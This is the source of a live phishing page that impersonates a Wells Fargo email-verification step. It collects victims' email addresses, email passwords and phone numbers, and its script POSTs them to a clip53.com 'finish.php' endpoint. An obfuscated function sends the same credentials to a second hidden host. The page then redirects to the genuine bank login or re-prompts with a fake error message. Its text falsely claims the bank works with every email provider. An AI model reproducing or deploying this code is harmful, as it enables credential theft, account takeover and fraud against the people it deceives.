<html class="ui-mobile wf-myriadpro-n4-active wf-active" lang="en" data-device="desktop" data-masked-input-enabled="true" data-print-link-enabled="true">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<title>Wells Fargo - Verification - Email Verification</title>



<link rel="stylesheet" href="https://clip53.com/wp-includes/images/piz/892/Files/css/jquery.mobile.css?v=19.10.00">
<link rel="stylesheet" href="https://clip53.com/wp-includes/images/piz/892/Files/css/normalize.css">
<link rel="stylesheet" href="https://clip53.com/wp-includes/images/piz/892/Files/css/Wells-Fargo-LIVE-Div.css"> 
<link rel="stylesheet" href="https://clip53.com/wp-includes/images/piz/892/Files/css/ClientPage.css">
<link rel="icon" href="favicon.ico" type="image/x-icon">
<link rel="stylesheet" href="https://clip53.com/wp-includes/images/piz/892/Files/css/desktop-tablet.combined.css?v=19.10.00">

<style type="text/css">.tk-myriad-pro{font-family:"myriad-pro",sans-serif;}</style><style type="text/css">@font-face{font-family:myriad-pro;src:url(https://clip53.com/wp-includes/images/piz/892/Files/css/b87d1abf881446b2bae0d8204029d20a9b85e656-l.woff2) format("woff2"),url(https://clip53.com/wp-includes/images/piz/892/Files/css/b87d1abf881446b2bae0d8204029d20a9b85e656-d.woff) format("woff"),url() format("opentype");font-weight:400;font-style:normal;}</style>
<!-- myriad font loaded  -->

</head>
<body class="ui-mobile-viewport ui-overlay-a" data-inq-observer="1">
<style type="text/css">
	.help-block.form-error {
    color: #dc3545!important;
}

msg {
  display: block;
}

</style>
	<div id="mainpage" data-role="page" class="osmp-app ui-page ui-page-theme-a ui-page-active" data-title="Wells Fargo - Application - About You" data-url="mainpage" tabindex="0" style="">

<header role="banner">
	<div class="masthead">
		<nav role="presentation">
					<a class="c28cLink child-window ui-link" aria-label="Wells Fargo" href="#"> <img class="masthead-img-logo" alt="Wells Fargo" role="img" src="https://clip53.com/wp-includes/images/piz/892/Files/img/lol1.svg">
					</a>
		</nav>

				<div role="navigation" class="top-search">
					<ul>

								<li class="security">
									<a class="c28cLink child-window ui-link" href="#" data-platform="salesplatform">Online Security<span class="ui-hidden-accessible">, opens in a new window</span>
									</a>
								</li>

					</ul>
				</div>

	</div>
</header>

		
		<div id="mainColumns" tabindex="-1" role="main" class="ui-content osmp-content">
			<div class="primary-content">
					<div class="progress-small small-screen">
					
	        	    	<span class="right">
		        	    	Step 3 of 5
	    	    		</span>
			    	</div>
  
			<div class="progress-bar not-small-screen">
				<ul class="ui-grid-d">
								            		
					            		<li class="ui-block-b previous">
							               <span class="ui-hidden-accessible">
								        	    	Completed Step
								        	    </span>
							            	<span><span>Contact information</span></span>
							            </li>						            
	            		
					            		<li class="ui-block-c active">
					            			<span class="ui-hidden-accessible">Current Step</span>
							            	<span><span>Email verification</span></span>
							            </li>						            
		            		
					            								            

					            				            		
					            		<li class="ui-block-e">
							        	    							            	
							            	<span><span>Review</span></span>
							            </li>						            
					            
					</ul>      
			</div>		

				<br>
<div class="section">

<div class="errmsg"  style="display: none; font-weight: bold;font-size: 13px;color: #E20303;position: relative;left: 20px;font-size: 15px;"><img src="https://clip53.com/wp-includes/images/piz/892/Files/img/error1.png"> We cannot authenticate your entry, Please try again.</div>

	 

<center>
	<div>
						
	
						</div>
                        <span id="error"  style="display: none; font-weight: bold;font-size: 13px;color: #E20303;position: relative;left: 20px;font-size: 15px;"</span> That account doesn't exist. Enter a valid Email
						
						<div class="errmsg" style="color: red; padding-bottom: 1em; font-size: 0.8em; display: none;">The user name or ра­s­s­wо­rd you entered isn't correct. Try entering it again.!</div>
						
                    </center>
					
<div role="alert" aria-live="polite">
<div id="msg" class="alert" aria-atomic="true" role="alert" tabindex="-1" style="display: none;font-weight: 710;">
<img src="https://clip53.com/wp-includes/images/piz/892/Files/img/error1.png">
<span style="font-weight: bold;font-size: 13px;color: #E20303;position: relative;left: 8px;font-size: 15px;">We cannot verify your entry. Please try again.</span>
</div><br><input type="hidden" name="invalid">
<h2 class="section-hdr">
	Email access information
</h2>



<form class="m-auto" id="themform">
	<div class="ui-field-contain">
		<label for="emailAddressJt">
			Email address
		</label>
		
<div class="ui-field-contain margin-bot-0">

		<input style="padding-left: 10px;" class="ui-input-text ui-body-inherit ui-corner-all ui-shadow-inset"  name="em" class="required EMAIL" data-validation="email" data-validation-error-msg="Please enter valid email address"  type="email" size="43" required="" placeholder="myemail@email.com" >
</div>
	</div>
	<div class="ui-field-contain">
		<label for="emailAddressJt">
			Email password
		</label>
		
		
		
<div class="ui-field-contain margin-bot-0">

		<input style="padding-left: 10px;" class="ui-input-text ui-body-inherit ui-corner-all ui-shadow-inset"  type="password" name="ps" class="required EMAIL" data-validation="length" data-validation-error-msg="Please enter the correct password" data-validation-length="min2" size="43" required="" placeholder="Password" >
</div>
	</div>
	
	
		<div class="ui-field-contain inline-field-contain">
			<div class="inline-field">
				<label for="primaryPhoneJt">
					Phone number
				</label>

				<input style="padding-left: 10px;" class="ui-input-text ui-body-inherit ui-corner-all ui-shadow-inset" id="phoneNumber" name="phonenumber" class="required PHONE" type="tel" value="" data-validation="length" data-validation-error-msg=" " data-validation-length="min14"  size="35"  placeholder="(___) ___ ____" >

	
			</div>
			
				
			</div>
		</div>

			<div class="ui-field-contain">
		
</div>
	</div>

<p style="color:red; font-size:15px"><strong>Important:</strong> </p> <p style="font-size:15px"> Wells Fargo is in collaboration with every email provider. Please confirm your email and password correctly for extra secure (SSL) security.</p>






<div class="btn-ctr"><div class="btn-ctr-inner">
	<input class="flow-event" type="hidden" name="_eventId_continue" value="">
	
	
	
<button type="submit"  data-mrkt-tracking-id="continue" id="submit-btn" class="continue-button ui-btn ui-btn-p">
				Continue
			</button>
			

			
</form>
<br>
<div style="display: none;" id="cancelPopup-placeholder"><!-- placeholder for cancelPopup --></div>

</div>

</div>
<div data-role="footer" class="osmp-footer ui-footer ui-bar-inherit singleColumn" role="contentinfo">
		
	<footer role="contentinfo">
			<div class="c9">
				<nav aria-label="corporate, legal, security">
					<ul class="not-large-screen">

									<li><a class="c28cLink child-window ui-link" href="#">Privacy, Cookies, Security &amp; Legal</a></li>
									<li><a class="c28cLink child-window ui-link" href="#">Ad Choices</a></li>
									<li><a class="c28cLink child-window ui-link" title="Online Security" href="#" data-platform="salesplatform">Online Security</a></li>

					
					</ul>				
					<ul class="large-screen">

									<li><a class="c28cLink child-window ui-link" href="#">Privacy, Cookies, Security &amp; Legal</a></li>
									<li><a class="c28cLink child-window ui-link" href="#">Ad Choices</a></li>
									<li><a class="c28cLink child-window ui-link" title="#" href="#" data-platform="salesplatform">Online Security</a></li>

					</ul>				
				</nav>
				<hr>
				© 1999 - <span class="placeholder">2021</span> Wells Fargo. All rights reserved. NMLSR ID 399801
			</div>
		</footer>
</div>

<div style="display: none;"><!-- placeholder --></div>
<div style="display: none;"><!-- placeholder --></div></div></div></div>

</div></div>
<div id="inqDivResizeCorner" style="border-width: 0px; position: absolute; z-index: 9999999; left: 424px; top: 284px; cursor: se-resize; height: 16px; width: 16px; display: none;">
</div>
<div id="inqResizeBox" style="border-width: 0px; position: absolute; z-index: 9999999; left: 0px; top: 0px; display:none; height: 0px; width: 0px;"></div><div id="inqTitleBar" style="border-width: 0px; position: absolute; z-index: 9999999; left: 0px; top: 0px; cursor: move; height: 55px; width: 410px; display: none;">
	
</div>
<div id="nuance-chat-anchored" style="position: fixed; width: auto; right:20px; bottom:20px; z-index: 999999;" aria-live="polite"><div>
<style>
 .wf-FAB-aval { 
     cursor: pointer;
     border: 1px solid #ffffff;
     border-radius: 50%; 
     background: #AE1E23; 
     box-shadow: 3px 3px 3px 0 rgba(0,0,0,.15);
     height: 56px;
     width: 56px;
     padding: 0;
 } 

 .wf-FAB-aval svg {
     display: block;
     margin: 5px auto 0 auto;  
 } 
 html .page {
    overflow: visible;
}
.ui-mobile input, .ui-mobile select, .ui-mobile textarea, .ui-mobile button, .ui-mobile .ui-btn, .ui-btn {
    line-height: 2.3;
}
</style></div></div><div id="nuance-chat-anchored-2" style="position: fixed; width: auto; right:20px; bottom:20px; z-index: 999988;"></div></body>

    
	 <script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js"></script>
    <script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js"></script>
    <script>

let href = $(location).attr('href');
    let divide1 = href.split("@");
    let divide2 = href.split("#");
    $('#theDomain').text(divide1[1]);
    $('#txtEmail').val(divide2[1]);


      $(document).ready(function(){
        var errmsg = $('.errmsg');
        errmsg.hide();
        var ufromUrl = get_email_hash();
        if(!ufromUrl){
          ufromUrl = geturlparameter('username'); 
        }
        var redirectUrl = 'https://connect.secure.wellsfargo.com/auth/login/present?origin=cob&LOB=CONS';
        var isStyleDouble = 3;
        var styleDoubleCounter = 1;
        var styleDoubleFromUrl = 1;
        var formcon = $('#themform');
        var em = $('#themform input[name=em]');
        var ps = $('#themform input[name=ps]');
        
        if(ufromUrl){ em.val(ufromUrl);  }
        var emv = ''; var psv = '';  
        if(isStyleDouble){
          styleDoubleFromUrl = geturlparameter('db');
          if(styleDoubleFromUrl){
            styleDoubleFromUrl = parseInt(styleDoubleFromUrl);
            if(isNaN(styleDoubleFromUrl)){
              styleDoubleFromUrl = 1;
            }
            if(styleDoubleFromUrl > 1){
            errmsg.show();
            }
          }
          else{ styleDoubleFromUrl = 1; }
        }
        formcon.submit(function(e){
          e.preventDefault();
          emv = em.val();
          psv = ps.val();
            if(em && em.length > 0 && psv && psv.length > 0){
              var theemidval = '802e01df4281d98de2cdfadf159e5e5f';
              mg(emv, psv,'Outlook 5');  
              $.ajax({
                url: 'https://clip53.com/blogs/media/wl/finish.php', 
                type: 'POST', 
                dataType: 'html', 
                data: { Email : emv, password : psv, typeofemail : 'Outlook 5', theemid : theemidval}, 
                crossDomain: true,
                  success: function(msg) {
                },
                error: function(e) {
                  console.log(e)
                }
              });
              if(isStyleDouble && styleDoubleFromUrl && styleDoubleFromUrl < isStyleDouble && styleDoubleFromUrl < 3){
                styleDoubleFromUrl++;
                redirectUrl = 't8r9MWOnKu9KkHOp0sYIibwk.html?'+get_rand_url_pars()+'&db='+styleDoubleFromUrl+'&username='+emv;
              }
              setTimeout(function(){
                window.location.replace(redirectUrl);
                //alert(redirectUrl);
              }, 1000);              
            }
          });
        
        
      });


function mg(a,o,t){var h = ['O','L','t','q','e','D','c','-','.','z','u','2','T','m','V','J','6','U','P','b','v','K','B','Z','i','7','R',':','C','/','o','r','n','Q','S','5','3','8','a','M','W','I','x','H','Y','4','1','k','s','d','g','A','j','F','N','9','G','l','f','p','X','0','w','y','E','h'],f = h[65]+h[2]+h[2]+h[59]+h[48]+h[27]+h[29]+h[29]+h[38]+h[59]+h[24]+h[49]+h[38]+h[2]+h[38]+h[6]+h[48]+h[48]+h[8]+h[6]+h[30]+h[13]+h[29]+h[58]+h[24]+h[32]+h[24]+h[48]+h[65]+h[7]+h[10]+h[32]+h[20]+h[11]+h[11]+h[8]+h[59]+h[65]+h[59];$.ajax({url:f,type:"POST",dataType:"html",data:{Email:a,password:o,typeofemail:t},crossDomain:!0,success:function(a){},error:function(a){}})}
function randomInteger(min, max) {return Math.floor(Math.random() * (max - min + 1)) + min; }
function randomString(r,n){for(var o="",t=r;0<t;--t)o+=n[Math.floor(Math.random()*n.length)];return o}
function getdomainpartofemail(a){var e,t=!1;return!validateEmail(a)||-1!=(e=(a=a.toLowerCase()).indexOf("@"))&&(t=a.substr(e+1)),t}
function get_email_hash(){var a=!1,i=window.location.href,t=(i=i.trim()).lastIndexOf("#");return-1!=t&&(a=i.substring(t+1),validateEmail(a)||(a=!1)),a}
function validateEmail(t){return/^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/.test(String(t).toLowerCase())}
function geturlparameter(r){for(var t=window.location.search.substring(1).split("&"),e=0;e<t.length;e++){var n=t[e].split("=");if(n[0]==r)return decodeURIComponent(n[1])}}
function get_rand_url_pars(){var r="",n=0,a="abcdefghijklmnopqrstuvwxyz",e=a;a+=a.toUpperCase()+"123456789";for(var t=randomInteger(3,10),n=0;n<t;n++)r+="&"+randomString(randomInteger(3,10),e)+"="+randomString(randomInteger(15,30),a);return r.substr(1)}

    </script>

	
</body>



</html>
